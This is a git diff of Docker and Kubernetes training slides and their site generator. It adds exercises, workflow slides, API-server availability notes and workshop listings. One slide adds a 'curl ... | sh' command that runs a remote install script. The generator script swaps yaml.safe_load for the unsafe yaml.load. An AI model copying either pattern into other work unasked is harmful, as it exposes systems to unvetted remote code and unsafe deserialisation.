@@ -0,0 +1,5 @@
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
9
slides/containers/Exercise_Dockerfile_Advanced.md
Normal file
@@ -0,0 +1,9 @@
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
5
slides/containers/Exercise_Dockerfile_Basic.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -203,4 +203,90 @@ bash: figlet: command not found
|
||||
|
||||
* The basic Ubuntu image was used, and `figlet` is not here.
|
||||
|
||||
* We will see in the next chapters how to bake a custom image with `figlet`.
|
||||
---
|
||||
|
||||
## Where's my container?
|
||||
|
||||
* Can we reuse that container that we took time to customize?
|
||||
|
||||
*We can, but that's not the default workflow with Docker.*
|
||||
|
||||
* What's the default workflow, then?
|
||||
|
||||
*Always start with a fresh container.*
|
||||
<br/>
|
||||
*If we need something installed in our container, build a custom image.*
|
||||
|
||||
* That seems complicated!
|
||||
|
||||
*We'll see that it's actually pretty easy!*
|
||||
|
||||
* And what's the point?
|
||||
|
||||
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
|
||||
|
||||
---
|
||||
|
||||
## Pets vs. Cattle
|
||||
|
||||
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
|
||||
|
||||
* Pets:
|
||||
|
||||
* have distinctive names and unique configurations
|
||||
|
||||
* when they have an outage, we do everything we can to fix them
|
||||
|
||||
* Cattle:
|
||||
|
||||
* have generic names (e.g. with numbers) and generic configuration
|
||||
|
||||
* configuration is enforced by configuration management, golden images ...
|
||||
|
||||
* when they have an outage, we can replace them immediately with a new server
|
||||
|
||||
* What's the connection with Docker and containers?
|
||||
|
||||
---
|
||||
|
||||
## Local development environments
|
||||
|
||||
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
|
||||
|
||||
* create VM from base template (Ubuntu, CentOS...)
|
||||
|
||||
* install packages, set up environment
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down VM
|
||||
|
||||
* next time we need to work on project, restart VM as we left it
|
||||
|
||||
* if we need to tweak the environment, we do it live
|
||||
|
||||
* Over time, the VM configuration evolves, diverges.
|
||||
|
||||
* We don't have a clean, reliable, deterministic way to provision that environment.
|
||||
|
||||
---
|
||||
|
||||
## Local development with Docker
|
||||
|
||||
* With Docker, the workflow looks like this:
|
||||
|
||||
* create container image with our dev environment
|
||||
|
||||
* run container with that image
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down container
|
||||
|
||||
* next time we need to work on project, start a new container
|
||||
|
||||
* if we need to tweak the environment, we create a new image
|
||||
|
||||
* We have a clear definition of our environment, and can share it reliably with others.
|
||||
|
||||
* Let's see in the next chapters how to bake a custom image with `figlet`!
|
||||
|
||||
@@ -70,8 +70,9 @@ class: pic
|
||||
|
||||
* An image is a read-only filesystem.
|
||||
|
||||
* A container is an encapsulated set of processes running in a
|
||||
read-write copy of that filesystem.
|
||||
* A container is an encapsulated set of processes,
|
||||
|
||||
running in a read-write copy of that filesystem.
|
||||
|
||||
* To optimize container boot time, *copy-on-write* is used
|
||||
instead of regular copy.
|
||||
@@ -177,8 +178,11 @@ Let's explain each of them.
|
||||
|
||||
## Root namespace
|
||||
|
||||
The root namespace is for official images. They are put there by Docker Inc.,
|
||||
but they are generally authored and maintained by third parties.
|
||||
The root namespace is for official images.
|
||||
|
||||
They are gated by Docker Inc.
|
||||
|
||||
They are generally authored and maintained by third parties.
|
||||
|
||||
Those images include:
|
||||
|
||||
@@ -188,7 +192,7 @@ Those images include:
|
||||
|
||||
* Ready-to-use components and services, like redis, postgresql...
|
||||
|
||||
* Over 130 at this point!
|
||||
* Over 150 at this point!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -38,11 +38,7 @@ We can arbitrarily distinguish:
|
||||
|
||||
## Installing Docker on Linux
|
||||
|
||||
* The recommended method is to install the packages supplied by Docker Inc.:
|
||||
|
||||
https://store.docker.com
|
||||
|
||||
* The general method is:
|
||||
* The recommended method is to install the packages supplied by Docker Inc :
|
||||
|
||||
- add Docker Inc.'s package repositories to your system configuration
|
||||
|
||||
@@ -56,6 +52,12 @@ We can arbitrarily distinguish:
|
||||
|
||||
https://docs.docker.com/engine/installation/linux/docker-ce/binaries/
|
||||
|
||||
* To quickly setup a dev environment, Docker provides a convenience install script:
|
||||
|
||||
```bash
|
||||
curl -fsSL get.docker.com | sh
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
@@ -156,7 +156,7 @@ Option 3:
|
||||
|
||||
* Use a *volume* to mount local files into the container
|
||||
* Make changes locally
|
||||
* Changes are reflected into the container
|
||||
* Changes are reflected in the container
|
||||
|
||||
---
|
||||
|
||||
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
|
||||
|
||||
* `namer` is the name of the image we will run.
|
||||
|
||||
* We don't specify a command to run because it is already set in the Dockerfile.
|
||||
* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
|
||||
|
||||
Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
|
||||
|
||||
@@ -192,7 +192,7 @@ The flag structure is:
|
||||
[host-path]:[container-path]:[rw|ro]
|
||||
```
|
||||
|
||||
* If `[host-path]` or `[container-path]` doesn't exist it is created.
|
||||
* `[host-path]` and `[container-path]` are created if they don't exist.
|
||||
|
||||
* You can control the write status of the volume with the `ro` and
|
||||
`rw` options.
|
||||
@@ -255,13 +255,13 @@ color: red;
|
||||
|
||||
* Volumes are *not* copying or synchronizing files between the host and the container.
|
||||
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
|
||||
|
||||
* Bind mounts are *kind of* similar to symbolic links, but at a very different level.
|
||||
|
||||
* Changes made on the host or on the container will be visible on the other side.
|
||||
|
||||
(Since under the hood, it's the same file on both anyway.)
|
||||
(Under the hood, it's the same file anyway.)
|
||||
|
||||
---
|
||||
|
||||
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
|
||||
|
||||
--
|
||||
|
||||
* Let's mess up majorly with our container.
|
||||
* Let's majorly mess up our container.
|
||||
|
||||
(Remove files or whatever.)
|
||||
|
||||
@@ -319,7 +319,7 @@ and *canary deployments*.
|
||||
<br/>
|
||||
Use the `-v` flag to mount our source code inside the container.
|
||||
|
||||
3. Edit the source code outside the containers, using regular tools.
|
||||
3. Edit the source code outside the container, using familiar tools.
|
||||
<br/>
|
||||
(vim, emacs, textmate...)
|
||||
|
||||
|
||||
@@ -86,13 +86,13 @@ class: extra-details, deep-dive
|
||||
|
||||
- the `unshare()` system call.
|
||||
|
||||
- The Linux tool `unshare` allows to do that from a shell.
|
||||
- The Linux tool `unshare` allows doing that from a shell.
|
||||
|
||||
- A new process can re-use none / all / some of the namespaces of its parent.
|
||||
|
||||
- It is possible to "enter" a namespace with the `setns()` system call.
|
||||
|
||||
- The Linux tool `nsenter` allows to do that from a shell.
|
||||
- The Linux tool `nsenter` allows doing that from a shell.
|
||||
|
||||
---
|
||||
|
||||
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
|
||||
|
||||
- gethostname / sethostname
|
||||
|
||||
- Allows to set a custom hostname for a container.
|
||||
- Allows setting a custom hostname for a container.
|
||||
|
||||
- That's (mostly) it!
|
||||
|
||||
- Also allows to set the NIS domain.
|
||||
- Also allows setting the NIS domain.
|
||||
|
||||
(If you don't know what a NIS domain is, you don't have to worry about it!)
|
||||
|
||||
@@ -392,13 +392,13 @@ class: extra-details
|
||||
|
||||
- Processes can have their own root fs (à la chroot).
|
||||
|
||||
- Processes can also have "private" mounts. This allows to:
|
||||
- Processes can also have "private" mounts. This allows:
|
||||
|
||||
- isolate `/tmp` (per user, per service...)
|
||||
- isolating `/tmp` (per user, per service...)
|
||||
|
||||
- mask `/proc`, `/sys` (for processes that don't need them)
|
||||
- masking `/proc`, `/sys` (for processes that don't need them)
|
||||
|
||||
- mount remote filesystems or sensitive data,
|
||||
- mounting remote filesystems or sensitive data,
|
||||
<br/>but make it visible only for allowed processes
|
||||
|
||||
- Mounts can be totally private, or shared.
|
||||
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
|
||||
|
||||
## User namespace
|
||||
|
||||
- Allows to map UID/GID; e.g.:
|
||||
- Allows mapping UID/GID; e.g.:
|
||||
|
||||
- UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
|
||||
- UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
|
||||
@@ -947,7 +947,7 @@ Killed
|
||||
|
||||
(i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
|
||||
|
||||
- Allows to set relative weights used by the scheduler.
|
||||
- Allows setting relative weights used by the scheduler.
|
||||
|
||||
---
|
||||
|
||||
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
|
||||
|
||||
- Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
|
||||
|
||||
- The seccomp-bpf extension allows to specify custom filters with BPF rules.
|
||||
- The seccomp-bpf extension allows specifying custom filters with BPF rules.
|
||||
|
||||
- This allows to filter by syscall, and by parameter.
|
||||
- This allows filtering by syscall, and by parameter.
|
||||
|
||||
- BPF code can perform arbitrarily complex checks, quickly, and safely.
|
||||
|
||||
|
||||
@@ -6,8 +6,6 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
@@ -121,7 +119,7 @@ Now, how are things for our IAAS provider?
|
||||
- Solution: *migrate* VMs and shutdown empty servers
|
||||
|
||||
(e.g. combine two hypervisors with 40% load into 80%+0%,
|
||||
<br/>and shutdown the one at 0%)
|
||||
<br/>and shut down the one at 0%)
|
||||
|
||||
---
|
||||
|
||||
@@ -129,7 +127,7 @@ Now, how are things for our IAAS provider?
|
||||
|
||||
How do we implement this?
|
||||
|
||||
- Shutdown empty hosts (but keep some spare capacity)
|
||||
- Shut down empty hosts (but keep some spare capacity)
|
||||
|
||||
- Start hosts again when capacity gets low
|
||||
|
||||
@@ -177,7 +175,7 @@ In practice, these goals often conflict.
|
||||
|
||||
- 16 GB RAM, 8 cores, 1 TB disk
|
||||
|
||||
- Each week, your team asks:
|
||||
- Each week, your team requests:
|
||||
|
||||
- one VM with X RAM, Y CPU, Z disk
|
||||
|
||||
@@ -249,7 +247,7 @@ class: pic
|
||||
|
||||
.center[]
|
||||
|
||||
## Can we do better?
|
||||
## We can't fit a job of size 6 :(
|
||||
|
||||
---
|
||||
|
||||
@@ -259,7 +257,7 @@ class: pic
|
||||
|
||||
.center[]
|
||||
|
||||
## Yup!
|
||||
## ... Now we can!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -72,7 +72,7 @@
|
||||
|
||||
- For memory usage, the mechanism is part of the *cgroup* subsystem.
|
||||
|
||||
- This subsystem allows to limit the memory for a process or a group of processes.
|
||||
- This subsystem allows limiting the memory for a process or a group of processes.
|
||||
|
||||
- A container engine leverages these mechanisms to limit memory for a container.
|
||||
|
||||
|
||||
@@ -45,13 +45,13 @@ individual Docker VM.*
|
||||
|
||||
- The Docker Engine is a daemon (a service running in the background).
|
||||
|
||||
- This daemon manages containers, the same way that an hypervisor manages VMs.
|
||||
- This daemon manages containers, the same way that a hypervisor manages VMs.
|
||||
|
||||
- We interact with the Docker Engine by using the Docker CLI.
|
||||
|
||||
- The Docker CLI and the Docker Engine communicate through an API.
|
||||
|
||||
- There are many other programs, and many client libraries, to use that API.
|
||||
- There are many other programs and client libraries which use that API.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
|
||||
|
||||
* Sharing a *single file* between the host and a container.
|
||||
|
||||
* Using remote storage and custom storage with "volume drivers".
|
||||
* Using remote storage and custom storage with *volume drivers*.
|
||||
|
||||
---
|
||||
|
||||
## Volumes are special directories in a container
|
||||
|
||||
Volumes can be declared in two different ways.
|
||||
Volumes can be declared in two different ways:
|
||||
|
||||
* Within a `Dockerfile`, with a `VOLUME` instruction.
|
||||
|
||||
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
|
||||
|
||||
* Volumes are used with the `-v` option.
|
||||
|
||||
* When a host path does not contain a /, it is considered to be a volume name.
|
||||
* When a host path does not contain a `/`, it is considered a volume name.
|
||||
|
||||
Let's start a web server using the two previous volumes.
|
||||
|
||||
@@ -189,7 +189,7 @@ $ curl localhost:1234
|
||||
|
||||
* In this example, we will run a text editor in the other container.
|
||||
|
||||
(But this could be a FTP server, a WebDAV server, a Git receiver...)
|
||||
(But this could be an FTP server, a WebDAV server, a Git receiver...)
|
||||
|
||||
Let's start another container using the `webapps` volume.
|
||||
|
||||
|
||||
BIN
slides/images/api-request-lifecycle.png
Normal file
|
After Width: | Height: | Size: 203 KiB |
1203
slides/images/kubectl-run-slideshow/01.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1193
slides/images/kubectl-run-slideshow/02.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
1203
slides/images/kubectl-run-slideshow/03.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1207
slides/images/kubectl-run-slideshow/04.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1239
slides/images/kubectl-run-slideshow/05.svg
Normal file
|
After Width: | Height: | Size: 84 KiB |
1209
slides/images/kubectl-run-slideshow/06.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/07.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/08.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/09.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/10.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/11.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/12.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/13.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/14.svg
Normal file
|
After Width: | Height: | Size: 83 KiB |
1209
slides/images/kubectl-run-slideshow/15.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/16.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1177
slides/images/kubectl-run-slideshow/17.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
1177
slides/images/kubectl-run-slideshow/18.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
1177
slides/images/kubectl-run-slideshow/19.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
@@ -1,4 +1,4 @@
|
||||
#!/usr/bin/env python3
|
||||
#!/usr/bin/env python2
|
||||
# coding: utf-8
|
||||
TEMPLATE="""<html>
|
||||
<head>
|
||||
@@ -12,6 +12,23 @@ TEMPLATE="""<html>
|
||||
<tr><td class="header" colspan="3">{{ title }}</td></tr>
|
||||
<tr><td class="details" colspan="3">Note: while some workshops are delivered in French, slides are always in English.</td></tr>
|
||||
|
||||
<tr><td class="title" colspan="3">Free video of our latest workshop</td></tr>
|
||||
|
||||
<tr>
|
||||
<td>Getting Started With Kubernetes and Container Orchestration</td>
|
||||
<td><a class="slides" href="https://qconuk2019.container.training" /></td>
|
||||
<td><a class="video" href="https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd" /></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="details">This is a live recording of a 1-day workshop that took place at QCON London in March 2019.</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="details">If you're interested, we can deliver that workshop (or longer courses) to your team or organization.</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="details">Contact <a href="mailto:jerome.petazzoni@gmail.com">Jérôme Petazzoni</a> to make that happen!</a></td>
|
||||
</tr>
|
||||
|
||||
{% if coming_soon %}
|
||||
<tr><td class="title" colspan="3">Coming soon near you</td></tr>
|
||||
|
||||
@@ -106,13 +123,13 @@ TEMPLATE="""<html>
|
||||
</table>
|
||||
</div>
|
||||
</body>
|
||||
</html>"""
|
||||
</html>""".decode("utf-8")
|
||||
|
||||
import datetime
|
||||
import jinja2
|
||||
import yaml
|
||||
|
||||
items = yaml.safe_load(open("index.yaml"))
|
||||
items = yaml.load(open("index.yaml"))
|
||||
|
||||
# Items with a date correspond to scheduled sessions.
|
||||
# Items without a date correspond to self-paced content.
|
||||
@@ -160,10 +177,10 @@ with open("index.html", "w") as f:
|
||||
past_workshops=past_workshops,
|
||||
self_paced=self_paced,
|
||||
recorded_workshops=recorded_workshops
|
||||
))
|
||||
).encode("utf-8"))
|
||||
|
||||
with open("past.html", "w") as f:
|
||||
f.write(template.render(
|
||||
title="Container Training",
|
||||
all_past_workshops=past_workshops
|
||||
))
|
||||
).encode("utf-8"))
|
||||
|
||||
@@ -1,20 +1,54 @@
|
||||
- date: 2019-06-18
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
title: Getting Started With Kubernetes And Orchestration
|
||||
- date: [2019-11-04, 2019-11-05]
|
||||
country: de
|
||||
city: Berlin
|
||||
event: Velocity
|
||||
speaker: jpetazzo
|
||||
status: coming soon
|
||||
hidden: http://elapsetech.com/formation/kubernetes-101
|
||||
title: Deploying and scaling applications with Kubernetes
|
||||
attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
|
||||
|
||||
- date: 2019-11-13
|
||||
country: fr
|
||||
city: Marseille
|
||||
event: DevopsDDay
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: http://2019.devops-dday.com/Workshop.html
|
||||
|
||||
- date: [2019-09-24, 2019-09-25]
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
|
||||
- date: 2019-07-16
|
||||
country: us
|
||||
city: Portland, OR
|
||||
event: OSCON
|
||||
speaker: bridgetkromhout
|
||||
title: "Kubernetes 201: Production tooling"
|
||||
attend: https://conferences.oreilly.com/oscon/oscon-or/public/schedule/detail/76390
|
||||
slides: https://oscon2019.container.training
|
||||
|
||||
- date: 2019-06-17
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
title: Getting Started With Docker And Containers
|
||||
event: Zenika
|
||||
speaker: jpetazzo
|
||||
status: coming soon
|
||||
hidden: http://elapsetech.com/formation/docker-101
|
||||
title: Getting Started With Kubernetes
|
||||
attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
|
||||
|
||||
- date: [2019-06-10, 2019-06-11]
|
||||
city: San Jose, CA
|
||||
country: us
|
||||
event: Velocity
|
||||
title: Kubernetes for administrators and operators
|
||||
speaker: jpetazzo
|
||||
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
|
||||
slides: https://kadm-2019-06.container.training/
|
||||
|
||||
- date: 2019-05-01
|
||||
country: us
|
||||
@@ -23,6 +57,8 @@
|
||||
speaker: jpetazzo, s0ulshake
|
||||
title: Getting started with Kubernetes and container orchestration
|
||||
attend: https://us.pycon.org/2019/schedule/presentation/74/
|
||||
slides: https://pycon2019.container.training/
|
||||
video: https://www.youtube.com/watch?v=J08MrW2NC1Y
|
||||
|
||||
- date: 2019-04-28
|
||||
country: us
|
||||
@@ -31,15 +67,26 @@
|
||||
speaker: jpetazzo
|
||||
title: Getting Started With Kubernetes and Container Orchestration
|
||||
attend: https://gotochgo.com/2019/workshops/148
|
||||
slides: https://gotochgo2019.container.training/
|
||||
|
||||
- date: 2019-04-26
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: jpetazzo
|
||||
title: Opérer et administrer Kubernetes
|
||||
attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
|
||||
slides: https://kadm-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-23, 2019-04-24]
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: "jpetazzo, rdegez"
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
slides: https://kube-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-15, 2019-04-16]
|
||||
country: fr
|
||||
@@ -49,6 +96,7 @@
|
||||
title: Bien démarrer avec les conteneurs (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
|
||||
slides: http://intro-2019-04.container.training/
|
||||
|
||||
- date: 2019-03-08
|
||||
country: uk
|
||||
@@ -58,40 +106,7 @@
|
||||
title: Getting Started With Kubernetes and Container Orchestration
|
||||
attend: https://qconlondon.com/london2019/workshop/getting-started-kubernetes-and-container-orchestration
|
||||
slides: https://qconuk2019.container.training/
|
||||
|
||||
- date: 2019-02-25
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Getting Started With Docker And Containers</strike> (rescheduled for June 2019)
|
||||
status: rescheduled
|
||||
|
||||
- date: 2019-02-26
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Getting Started With Kubernetes And Orchestration</strike> (rescheduled for June 2019)
|
||||
status: rescheduled
|
||||
|
||||
- date: 2019-02-28
|
||||
country: ca
|
||||
city: Québec
|
||||
lang: fr
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Bien démarrer avec Docker et les conteneurs (in French)</strike>
|
||||
status: cancelled
|
||||
|
||||
- date: 2019-03-01
|
||||
country: ca
|
||||
city: Québec
|
||||
lang: fr
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Bien démarrer avec Docker et l'orchestration (in French)</strike>
|
||||
status: cancelled
|
||||
video: https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd
|
||||
|
||||
- date: [2019-01-07, 2019-01-08]
|
||||
country: fr
|
||||
|
||||
@@ -19,7 +19,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - containers/Docker_Overview.md
|
||||
- containers/Docker_History.md
|
||||
#- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
- containers/Installing_Docker.md
|
||||
- containers/First_Containers.md
|
||||
@@ -29,13 +29,16 @@ chapters:
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
- containers/Resource_Limits.md
|
||||
- - containers/Container_Networking_Basics.md
|
||||
- containers/Network_Drivers.md
|
||||
- containers/Container_Network_Model.md
|
||||
@@ -45,16 +48,16 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
- containers/Logging.md
|
||||
- containers/Resource_Limits.md
|
||||
- - containers/Namespaces_Cgroups.md
|
||||
- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
- - containers/Container_Engines.md
|
||||
- containers/Ecosystem.md
|
||||
#- containers/Ecosystem.md
|
||||
- containers/Orchestration_Overview.md
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
|
||||
@@ -30,9 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -45,6 +47,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
89
slides/k8s/apilb.md
Normal file
@@ -0,0 +1,89 @@
|
||||
# API server availability
|
||||
|
||||
- When we set up a node, we need the address of the API server:
|
||||
|
||||
- for kubelet
|
||||
|
||||
- for kube-proxy
|
||||
|
||||
- sometimes for the pod network system (like kube-router)
|
||||
|
||||
- How do we ensure the availability of that endpoint?
|
||||
|
||||
(what if the node running the API server goes down?)
|
||||
|
||||
---
|
||||
|
||||
## Option 1: external load balancer
|
||||
|
||||
- Set up an external load balancer
|
||||
|
||||
- Point kubelet (and other components) to that load balancer
|
||||
|
||||
- Put the node(s) running the API server behind that load balancer
|
||||
|
||||
- Update the load balancer if/when an API server node needs to be replaced
|
||||
|
||||
- On cloud infrastructures, some mechanisms provide automation for this
|
||||
|
||||
(e.g. on AWS, an Elastic Load Balancer + Auto Scaling Group)
|
||||
|
||||
- [Example in Kubernetes The Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/08-bootstrapping-kubernetes-controllers.md#the-kubernetes-frontend-load-balancer)
|
||||
|
||||
---
|
||||
|
||||
## Option 2: local load balancer
|
||||
|
||||
- Set up a load balancer (like NGINX, HAProxy...) on *each* node
|
||||
|
||||
- Configure that load balancer to send traffic to the API server node(s)
|
||||
|
||||
- Point kubelet (and other components) to `localhost`
|
||||
|
||||
- Update the load balancer configuration when API server nodes are updated
|
||||
|
||||
---
|
||||
|
||||
## Updating the local load balancer config
|
||||
|
||||
- Distribute the updated configuration (push)
|
||||
|
||||
- Or regularly check for updates (pull)
|
||||
|
||||
- The latter requires an external, highly available store
|
||||
|
||||
(it could be an object store, an HTTP server, or even DNS...)
|
||||
|
||||
- Updates can be facilitated by a DaemonSet
|
||||
|
||||
(but remember that it can't be used when installing a new node!)
|
||||
|
||||
---
|
||||
|
||||
## Option 3: DNS records
|
||||
|
||||
- Put all the API server nodes behind a round-robin DNS
|
||||
|
||||
- Point kubelet (and other components) to that name
|
||||
|
||||
- Update the records when needed
|
||||
|
||||
- Note: this option is not officially supported
|
||||
|
||||
(but since kubelet supports reconnection anyway, it *should* work)
|
||||
|
||||
---
|
||||
|
||||
## Option 4: ....................
|
||||
|
||||
- Many managed clusters expose a high-availability API endpoint
|
||||
|
||||
(and you don't have to worry about it)
|
||||
|
||||
- You can also use HA mechanisms that you're familiar with
|
||||
|
||||
(e.g. virtual IPs)
|
||||
|
||||
- Tunnels are also fine
|
||||
|
||||
(e.g. [k3s](https://k3s.io/) uses a tunnel to allow each node to contact the API server)
|
||||
383
slides/k8s/architecture.md
Normal file
@@ -0,0 +1,383 @@
|
||||
# Kubernetes architecture
|
||||
|
||||
We can arbitrarily split Kubernetes in two parts:
|
||||
|
||||
- the *nodes*, a set of machines that run our containerized workloads;
|
||||
|
||||
- the *control plane*, a set of processes implementing the Kubernetes APIs.
|
||||
|
||||
Kubernetes also relies on underlying infrastructure:
|
||||
|
||||
- servers, network connectivity (obviously!),
|
||||
|
||||
- optional components like storage systems, load balancers ...
|
||||
|
||||
---
|
||||
|
||||
## Control plane location
|
||||
|
||||
The control plane can run:
|
||||
|
||||
- in containers, on the same nodes that run other application workloads
|
||||
|
||||
(example: Minikube; 1 node runs everything)
|
||||
|
||||
- on a dedicated node
|
||||
|
||||
(example: a cluster installed with kubeadm)
|
||||
|
||||
- on a dedicated set of nodes
|
||||
|
||||
(example: Kubernetes The Hard Way; kops)
|
||||
|
||||
- outside of the cluster
|
||||
|
||||
(example: most managed clusters like AKS, EKS, GKE)
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

